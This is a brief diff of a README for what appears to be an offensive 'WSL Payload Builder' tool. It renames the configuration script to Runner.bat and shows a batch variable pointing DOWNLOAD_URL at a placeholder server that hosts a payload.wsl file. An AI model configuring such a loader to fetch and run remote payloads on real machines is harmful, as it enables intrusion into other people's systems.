m1ddl3w4r3/WSL_Payload_Builder/README.md

 #### Configuration

-Edit the variables at the top of `payload.bat` to customize:
+Edit the variables at the top of `Runner.bat` to customize:

 ```batch
 set "DOWNLOAD_URL=https://your-server.com/payload.wsl"